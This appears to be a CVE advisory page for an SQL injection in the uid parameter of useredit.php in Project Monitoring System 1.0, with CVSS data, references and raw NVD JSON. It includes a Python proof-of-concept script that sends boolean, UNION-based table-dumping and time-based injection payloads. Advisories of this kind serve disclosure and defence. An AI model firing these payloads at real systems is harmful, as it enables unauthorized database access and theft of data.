CVE-2025-11585

Description

A vulnerability was found in code-projects Project Monitoring System 1.0. The impacted element is an unknown function of the file /useredit.php. The manipulation of the argument uid results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:project_monitoring_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Project Monitoring System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11585 SQL Injection PoC
# Target: code-projects Project Monitoring System 1.0
# Vulnerable file: /useredit.php
# Vulnerable parameter: uid

import requests

TARGET_URL = "http://target.com"
VULNERABLE_ENDPOINT = "/useredit.php"

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection in useredit.php via uid parameter
    """
    url = f"{target_url}{VULNERABLE_ENDPOINT}"
    params = {
        "uid": payload
    }
    try:
        response = requests.get(url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

# Test 1: Basic SQL injection detection
payload_basic = "1' OR '1'='1"
print(f"[*] Testing basic SQL injection with payload: {payload_basic}")
result = exploit_sqli(TARGET_URL, payload_basic)
if result:
    print(f"[+] Response length: {len(result)}")
    print(f"[+] Response preview: {result[:200]}")

# Test 2: UNION-based injection to extract database version
payload_union = "1' UNION SELECT 1,version(),3,4,5-- -"
print(f"\n[*] Testing UNION-based injection: {payload_union}")
result = exploit_sqli(TARGET_URL, payload_union)
if result:
    print(f"[+] Response: {result[:500]}")

# Test 3: Extract table names using information_schema
payload_tables = "1' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- -"
print(f"\n[*] Extracting table names...")
result = exploit_sqli(TARGET_URL, payload_tables)
if result:
    print(f"[+] Tables found: {result[:500]}")

# Test 4: Time-based blind injection
import time
payload_time = "1' AND SLEEP(5)-- -"
print(f"\n[*] Testing time-based blind injection...")
start_time = time.time()
exploit_sqli(TARGET_URL, payload_time)
elapsed = time.time() - start_time
print(f"[+] Elapsed time: {elapsed:.2f} seconds (should be > 5 if vulnerable)")

print("\n[*] Exploitation complete")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11585
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11585
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11585/
[4] VulDB https://vuldb.com/cve/CVE-2025-11585
[5] https://code-projects.org/
[6] https://github.com/tiancesec/CVE/issues/8
[7] https://vuldb.com/?ctiid.327907
[8] https://vuldb.com/?id.327907
[9] https://vuldb.com/?submit.671506

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11585", "sourceIdentifier": "[email protected]", "published": "2025-10-10T21:16:06.110", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Project Monitoring System 1.0. The impacted element is an unknown function of the file /useredit.php. The manipulation of the argument uid results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:project_monitoring_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0640552B-18FA-4CD0-8DB5-F94C2BD7E2EC"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/tiancesec/CVE/issues/8", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327907", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327907", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671506", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}